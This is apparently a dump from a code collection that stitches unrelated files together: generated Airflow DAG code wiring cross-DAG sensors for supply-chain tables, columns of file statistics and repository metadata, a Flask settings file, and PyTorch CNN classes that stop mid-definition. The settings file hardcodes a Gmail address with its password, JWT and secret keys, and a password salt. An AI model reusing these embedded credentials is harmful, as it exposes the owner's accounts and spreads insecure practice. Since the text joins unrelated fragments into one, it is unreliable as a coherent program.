retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_SCMxD_INT_SCM__INT_RFQ_Master.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master)
BRANCH_D_DM_SCMxD_INT_SCM__INT_RFQ_Master.set_downstream(D_DM_SCMxD_INT_SCM__INT_RFQ_Master)
D_DM_SCMxD_INT_SCM__INT_RFQ_Master.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master)
def branch_D_DM_SCMxD_INT_SCM__INT_Inventory_A(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_INT_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A","D_DM_SCMxD_INT_SCM__INT_Inventory_A"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A","D_DM_SCMxD_INT_SCM__INT_Inventory_A"]
return ["proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A"]
my_taskid = "BRANCH_D_DM_SCMxD_INT_SCM__INT_Inventory_A"
BRANCH_D_DM_SCMxD_INT_SCM__INT_Inventory_A= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_SCMxD_INT_SCM__INT_Inventory_A,
dag=D_DM_SCM,
provide_context=True,
)
my_taskid = "proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A"
proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_SCM,
)
# Cross dag sensor
my_taskid = "D_DM_SCMxD_INT_SCM__INT_Inventory_A"
D_DM_SCMxD_INT_SCM__INT_Inventory_A= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_INT_SCM",
external_task_id="INT_Inventory_A",
mode="reschedule",
dag=D_DM_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_SCMxD_INT_SCM__INT_Inventory_A.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A)
BRANCH_D_DM_SCMxD_INT_SCM__INT_Inventory_A.set_downstream(D_DM_SCMxD_INT_SCM__INT_Inventory_A)
D_DM_SCMxD_INT_SCM__INT_Inventory_A.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A)
def branch_D_DM_SCMxD_INT_SCM__INT_DOI_Actual(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_INT_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual","D_DM_SCMxD_INT_SCM__INT_DOI_Actual"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual","D_DM_SCMxD_INT_SCM__INT_DOI_Actual"]
return ["proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual"]
my_taskid = "BRANCH_D_DM_SCMxD_INT_SCM__INT_DOI_Actual"
BRANCH_D_DM_SCMxD_INT_SCM__INT_DOI_Actual= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_DM_SCMxD_INT_SCM__INT_DOI_Actual,
dag=D_DM_SCM,
provide_context=True,
)
my_taskid = "proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual"
proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_DM_SCM,
)
# Cross dag sensor
my_taskid = "D_DM_SCMxD_INT_SCM__INT_DOI_Actual"
D_DM_SCMxD_INT_SCM__INT_DOI_Actual= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_INT_SCM",
external_task_id="INT_DOI_Actual",
mode="reschedule",
dag=D_DM_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_DM_SCMxD_INT_SCM__INT_DOI_Actual.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual)
BRANCH_D_DM_SCMxD_INT_SCM__INT_DOI_Actual.set_downstream(D_DM_SCMxD_INT_SCM__INT_DOI_Actual)
D_DM_SCMxD_INT_SCM__INT_DOI_Actual.set_downstream(proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual)
def branch_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A","D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A","D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A"]
return ["proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A"]
my_taskid = "BRANCH_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A"
BRANCH_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A,
dag=D_INT_SCM,
provide_context=True,
)
my_taskid = "proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A"
proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_INT_SCM,
)
# Cross dag sensor
my_taskid = "D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A"
D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_SCM",
external_task_id="PNL_Revenue_Cost_A",
mode="reschedule",
dag=D_INT_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A)
BRANCH_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A.set_downstream(D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A)
D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A)
def branch_D_INT_SCMxD_ODS_SCM__NRE_Summary(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary","D_INT_SCMxD_ODS_SCM__NRE_Summary"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary","D_INT_SCMxD_ODS_SCM__NRE_Summary"]
return ["proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary"]
my_taskid = "BRANCH_D_INT_SCMxD_ODS_SCM__NRE_Summary"
BRANCH_D_INT_SCMxD_ODS_SCM__NRE_Summary= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_INT_SCMxD_ODS_SCM__NRE_Summary,
dag=D_INT_SCM,
provide_context=True,
)
my_taskid = "proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary"
proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_INT_SCM,
)
# Cross dag sensor
my_taskid = "D_INT_SCMxD_ODS_SCM__NRE_Summary"
D_INT_SCMxD_ODS_SCM__NRE_Summary= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_SCM",
external_task_id="NRE_Summary",
mode="reschedule",
dag=D_INT_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_INT_SCMxD_ODS_SCM__NRE_Summary.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary)
BRANCH_D_INT_SCMxD_ODS_SCM__NRE_Summary.set_downstream(D_INT_SCMxD_ODS_SCM__NRE_Summary)
D_INT_SCMxD_ODS_SCM__NRE_Summary.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary)
def branch_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F","D_INT_SCMxD_ODS_SCM__Daily_Revenue_F"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F","D_INT_SCMxD_ODS_SCM__Daily_Revenue_F"]
return ["proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F"]
my_taskid = "BRANCH_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F"
BRANCH_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F,
dag=D_INT_SCM,
provide_context=True,
)
my_taskid = "proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F"
proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_INT_SCM,
)
# Cross dag sensor
my_taskid = "D_INT_SCMxD_ODS_SCM__Daily_Revenue_F"
D_INT_SCMxD_ODS_SCM__Daily_Revenue_F= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_SCM",
external_task_id="Daily_Revenue_F",
mode="reschedule",
dag=D_INT_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F)
BRANCH_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F.set_downstream(D_INT_SCMxD_ODS_SCM__Daily_Revenue_F)
D_INT_SCMxD_ODS_SCM__Daily_Revenue_F.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F)
def branch_D_INT_SCMxD_ODS_SCM__RFQ_Master(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master","D_INT_SCMxD_ODS_SCM__RFQ_Master"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master","D_INT_SCMxD_ODS_SCM__RFQ_Master"]
return ["proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master"]
my_taskid = "BRANCH_D_INT_SCMxD_ODS_SCM__RFQ_Master"
BRANCH_D_INT_SCMxD_ODS_SCM__RFQ_Master= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_INT_SCMxD_ODS_SCM__RFQ_Master,
dag=D_INT_SCM,
provide_context=True,
)
my_taskid = "proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master"
proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_INT_SCM,
)
# Cross dag sensor
my_taskid = "D_INT_SCMxD_ODS_SCM__RFQ_Master"
D_INT_SCMxD_ODS_SCM__RFQ_Master= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_SCM",
external_task_id="RFQ_Master",
mode="reschedule",
dag=D_INT_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_INT_SCMxD_ODS_SCM__RFQ_Master.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master)
BRANCH_D_INT_SCMxD_ODS_SCM__RFQ_Master.set_downstream(D_INT_SCMxD_ODS_SCM__RFQ_Master)
D_INT_SCMxD_ODS_SCM__RFQ_Master.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master)
def branch_D_INT_SCMxD_ODS_SCM__Inventory_A(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_INT_SCMxD_ODS_SCM__Inventory_A","D_INT_SCMxD_ODS_SCM__Inventory_A"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_INT_SCMxD_ODS_SCM__Inventory_A","D_INT_SCMxD_ODS_SCM__Inventory_A"]
return ["proxy_D_INT_SCMxD_ODS_SCM__Inventory_A"]
my_taskid = "BRANCH_D_INT_SCMxD_ODS_SCM__Inventory_A"
BRANCH_D_INT_SCMxD_ODS_SCM__Inventory_A= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_INT_SCMxD_ODS_SCM__Inventory_A,
dag=D_INT_SCM,
provide_context=True,
)
my_taskid = "proxy_D_INT_SCMxD_ODS_SCM__Inventory_A"
proxy_D_INT_SCMxD_ODS_SCM__Inventory_A= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_INT_SCM,
)
# Cross dag sensor
my_taskid = "D_INT_SCMxD_ODS_SCM__Inventory_A"
D_INT_SCMxD_ODS_SCM__Inventory_A= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_SCM",
external_task_id="Inventory_A",
mode="reschedule",
dag=D_INT_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_INT_SCMxD_ODS_SCM__Inventory_A.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__Inventory_A)
BRANCH_D_INT_SCMxD_ODS_SCM__Inventory_A.set_downstream(D_INT_SCMxD_ODS_SCM__Inventory_A)
D_INT_SCMxD_ODS_SCM__Inventory_A.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__Inventory_A)
def branch_D_INT_SCMxD_ODS_SCM__DOI_Actual(**context):
mydag = context["dag"]
dagbag = DagBag()
upstream = dagbag.get_dag("D_ODS_SCM")
# print("branch::DEBUG:upstream.latest_execution_date:", upstream.latest_execution_date)
# print("branch::DEBUG:mydag.execution_date:", context['execution_date'])
up_sch_interval = std_interval.get(upstream.schedule_interval)
my_sch_interval = std_interval.get(mydag.schedule_interval)
if up_sch_interval is None or my_sch_interval is None:
if (up_sch_interval is None and my_sch_interval is None) and (upstream.schedule_interval == mydag.schedule_interval):
return ["proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual","D_INT_SCMxD_ODS_SCM__DOI_Actual"]
elif std_interval[upstream.schedule_interval] >= std_interval[mydag.schedule_interval]:
if upstream.latest_execution_date == context["execution_date"]:
return ["proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual","D_INT_SCMxD_ODS_SCM__DOI_Actual"]
return ["proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual"]
my_taskid = "BRANCH_D_INT_SCMxD_ODS_SCM__DOI_Actual"
BRANCH_D_INT_SCMxD_ODS_SCM__DOI_Actual= BranchPythonOperator(
task_id=my_taskid,
python_callable=branch_D_INT_SCMxD_ODS_SCM__DOI_Actual,
dag=D_INT_SCM,
provide_context=True,
)
my_taskid = "proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual"
proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual= DummyOperator(
task_id=my_taskid,
trigger_rule="none_failed_or_skipped",
dag=D_INT_SCM,
)
# Cross dag sensor
my_taskid = "D_INT_SCMxD_ODS_SCM__DOI_Actual"
D_INT_SCMxD_ODS_SCM__DOI_Actual= ExternalTaskSensor(
pool = "sensor_pool",
task_id=my_taskid,
external_dag_id="D_ODS_SCM",
external_task_id="DOI_Actual",
mode="reschedule",
dag=D_INT_SCM,
check_existence=True,
timeout=60*60*1,
retries=5,
retry_delay=timedelta(minutes=3),
execution_date_fn=sqlg_exec_date_fn
)
BRANCH_D_INT_SCMxD_ODS_SCM__DOI_Actual.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual)
BRANCH_D_INT_SCMxD_ODS_SCM__DOI_Actual.set_downstream(D_INT_SCMxD_ODS_SCM__DOI_Actual)
D_INT_SCMxD_ODS_SCM__DOI_Actual.set_downstream(proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual)
# XSLT:loop: JOB_FLOW_NAME-and-PRE_JOB: External: END}}
# XSLT:loop: JOB_FLOW_NAME: START{
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_ODS_SCM.PNL_Revenue_Cost_A
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(PNL_Revenue_Cost_A)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(NRE_Summary)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(Daily_Revenue_F)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(RFQ_Master)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(Inventory_A)
proxy_D_ODS_SCMxD_STG_INIT__SYS_STS_STG.set_downstream(DOI_Actual)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_DM_SCM.DM_PNL_Revenue_Cost_A
proxy_D_DM_SCMxD_INT_SCM__INT_PNL_Revenue_Cost_A.set_downstream(DM_PNL_Revenue_Cost_A)
proxy_D_DM_SCMxD_INT_SCM__INT_NRE_Summary.set_downstream(DM_NRE_Summary)
proxy_D_DM_SCMxD_INT_SCM__INT_Daily_Revenue_F.set_downstream(DM_Daily_Revenue_F)
proxy_D_DM_SCMxD_INT_SCM__INT_RFQ_Master.set_downstream(DM_RFQ_Master)
proxy_D_DM_SCMxD_INT_SCM__INT_Inventory_A.set_downstream(DM_Inventory_A)
proxy_D_DM_SCMxD_INT_SCM__INT_DOI_Actual.set_downstream(DM_DOI_Actual)
# XSLT:loop: Rows-by-JOB_FLOW_NAME: JOB_NAME: START{{
# FLOW: D_INT_SCM.INT_PNL_Revenue_Cost_A
proxy_D_INT_SCMxD_ODS_SCM__PNL_Revenue_Cost_A.set_downstream(INT_PNL_Revenue_Cost_A)
proxy_D_INT_SCMxD_ODS_SCM__NRE_Summary.set_downstream(INT_NRE_Summary)
proxy_D_INT_SCMxD_ODS_SCM__Daily_Revenue_F.set_downstream(INT_Daily_Revenue_F)
proxy_D_INT_SCMxD_ODS_SCM__RFQ_Master.set_downstream(INT_RFQ_Master)
proxy_D_INT_SCMxD_ODS_SCM__Inventory_A.set_downstream(INT_Inventory_A)
proxy_D_INT_SCMxD_ODS_SCM__DOI_Actual.set_downstream(INT_DOI_Actual)
| 35.681781
| 125
| 0.760293
| 6,602
| 43,282
| 4.403817
| 0.035747
| 0.022013
| 0.037456
| 0.045401
| 0.934374
| 0.929146
| 0.922027
| 0.915801
| 0.901734
| 0.867373
| 0
| 0.00656
| 0.13717
| 43,282
| 1,212
| 126
| 35.711221
| 0.771964
| 0.134952
| 0
| 0.602564
| 1
| 0
| 0.201361
| 0.147786
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016317
| false
| 0
| 0.017483
| 0
| 0.08042
| 0.001166
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
30bb60d30f58a95f80eba5ef5f41b73258fcd004
| 1,363
|
py
|
Python
|
src/api/config/config.py
|
nguyenhuunghi/author-manager
|
91d39c3fbbc63b2290c7c7138a18bee0258348f8
|
[
"MIT"
] | null | null | null |
src/api/config/config.py
|
nguyenhuunghi/author-manager
|
91d39c3fbbc63b2290c7c7138a18bee0258348f8
|
[
"MIT"
] | null | null | null |
src/api/config/config.py
|
nguyenhuunghi/author-manager
|
91d39c3fbbc63b2290c7c7138a18bee0258348f8
|
[
"MIT"
] | null | null | null |
class Config(object):
DEBUG = False
TESTING = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
class Production(Config):
SQLALCHEMY_DATABASE_URI = '<Production DB URL>'
class Development(Config):
# psql postgresql://Nghi:nghi1996@localhost/postgres
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'postgresql://Nghi:nghi1996@localhost/postgres'
SQLALCHEMY_ECHO = False
JWT_SECRET_KEY = 'JWT_SECRET_NGHI!123'
SECRET_KEY = 'SECRET_KEY_NGHI_ABC!123'
SECURITY_PASSWORD_SALT = 'SECURITY_PASSWORD_SALT_NGHI_ABC!123'
MAIL_DEFAULT_SENDER = 'dev2020@localhost'
MAIL_SERVER = 'smtp.gmail.com'
MAIL_PORT = 465
MAIL_USERNAME = 'nghidev2020@gmail.com'
MAIL_PASSWORD = 'nghi1996'
MAIL_USE_TLS = False
MAIL_USE_SSL = True
UPLOAD_FOLDER = 'images'
class Testing(Config):
TESTING = True
# SQLALCHEMY_DATABASE_URI = 'postgresql://Nghi:nghi1996@localhost/postgres_test'
SQLALCHEMY_ECHO = False
JWT_SECRET_KEY = 'JWT_SECRET_NGHI!123'
SECRET_KEY = 'SECRET_KEY_NGHI_ABC!123'
SECURITY_PASSWORD_SALT = 'SECURITY_PASSWORD_SALT_NGHI_ABC!123'
MAIL_DEFAULT_SENDER = 'dev2020@localhost'
MAIL_SERVER = 'smtp.gmail.com'
MAIL_PORT = 465
MAIL_USERNAME = 'nghidev2020@gmail.com'
MAIL_PASSWORD = 'nghi1996'
MAIL_USE_TLS = False
MAIL_USE_SSL = True
UPLOAD_FOLDER = 'images'
| 30.977273
| 84
| 0.730007
| 169
| 1,363
| 5.526627
| 0.295858
| 0.057816
| 0.042827
| 0.099572
| 0.797645
| 0.755889
| 0.755889
| 0.755889
| 0.755889
| 0.618844
| 0
| 0.053812
| 0.181952
| 1,363
| 43
| 85
| 31.697674
| 0.783857
| 0.094644
| 0
| 0.685714
| 0
| 0
| 0.284322
| 0.164907
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.114286
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
30c431499dc4bcd6bf5914680a8fce4d549de942
| 11,016
|
py
|
Python
|
architecture.py
|
tranic/histopathology_cancer_detection
|
6e9916cd73ebf8a5a1dfefe6f6c203a8e760c2db
|
[
"MIT"
] | 4
|
2020-08-14T14:48:27.000Z
|
2021-06-15T17:01:34.000Z
|
architecture.py
|
tranic/dl_histopathology_cancer_detection
|
771932bfd4a0db2af733fe25953af324bc83771b
|
[
"MIT"
] | 3
|
2020-07-21T19:24:45.000Z
|
2020-07-24T12:09:14.000Z
|
architecture.py
|
tranic/histopathology_cancer_detection
|
6e9916cd73ebf8a5a1dfefe6f6c203a8e760c2db
|
[
"MIT"
] | null | null | null |
from torch import nn
from torchvision import models
import torch
"""
This file contains all CNN architectures as classes (non-pretrained and pretrained) inheriting from torch.nn.Module.
"""
class LeNet(nn.Module):
def __init__(self):
super(LeNet, self).__init__()
self.ReLu = nn.ReLU(inplace=True)
self.flatten = nn.Flatten()
self.conv2d_0 = nn.Conv2d(3, 6, kernel_size=5, padding=2)
self.pool_1 = nn.MaxPool2d(kernel_size=2, stride=2)
self.conv2d_2 = nn.Conv2d(6, 16, kernel_size=5)
self.pool_3 = nn.MaxPool2d(kernel_size=2, stride=2)
self.linear_4 = nn.Linear(16 * 22 * 22, 120)
self.linear_5 = nn.Linear(120, 10)
# two outputs for softmax in final layer
self.output = nn.Linear(10, 1)
def forward(self, X, **kwargs):
X = X.view(-1, 3, 96, 96).float()
X = self.ReLu(self.conv2d_0(X))
X = self.pool_1(X)
X = self.ReLu(self.conv2d_2(X))
X = self.pool_3(X)
X = self.flatten(X)
X = self.ReLu(self.linear_4(X))
X = self.ReLu(self.linear_5(X))
X = self.output(X)
return X
class DenseNet121(nn.Module):
def __init__(self):
super(DenseNet121, self).__init__()
base_net = models.densenet121(pretrained=False)
self.features = base_net.features
self.dense121_relu = nn.ReLU(inplace=True)
self.dense121_pool = nn.AdaptiveAvgPool2d((1, 1))
self.classifier = nn.Sequential(nn.Linear(1024, 512),
nn.Dropout(p=0.1),
nn.ReLU(),
nn.Linear(512, 1))
del base_net
def forward(self, X):
X = X.view(-1, 3, 96, 96).float()
X = self.features(X)
# Convert output of predifined dense121 layers to a format that can used by the classifier "layers"
X = self.dense121_relu(X)
X = self.dense121_pool(X)
X = torch.flatten(X, 1)
X = self.classifier(X)
return X
class DenseNet121Pretrained(nn.Module):
def __init__(self):
super(DenseNet121Pretrained, self).__init__()
base_net = models.densenet121(pretrained=True)
self.features = base_net.features
self.dense121_relu = nn.ReLU(inplace=True)
self.dense121_pool = nn.AdaptiveAvgPool2d((1, 1))
# we only want to train the last layers
for param in list(self.features.parameters()):
param.requires_grad = False # as default is True for all
for param in list(self.features.denseblock4.denselayer13.parameters()):
param.requires_grad = True
for param in list(self.features.denseblock4.denselayer14.parameters()):
param.requires_grad = True
for param in list(self.features.denseblock4.denselayer15.parameters()):
param.requires_grad = True
for param in list(self.features.denseblock4.denselayer16.parameters()):
param.requires_grad = True
self.classifier = nn.Sequential(nn.Linear(1024, 512),
nn.Dropout(p=0.1),
nn.ReLU(),
nn.Linear(512, 1))
del base_net
def forward(self, X):
X = X.view(-1, 3, 224, 224).float()
X = self.features(X)
X = self.dense121_relu(X)
X = self.dense121_pool(X)
X = torch.flatten(X, 1)
X = self.classifier(X)
return X
class DenseNet201(nn.Module):
def __init__(self):
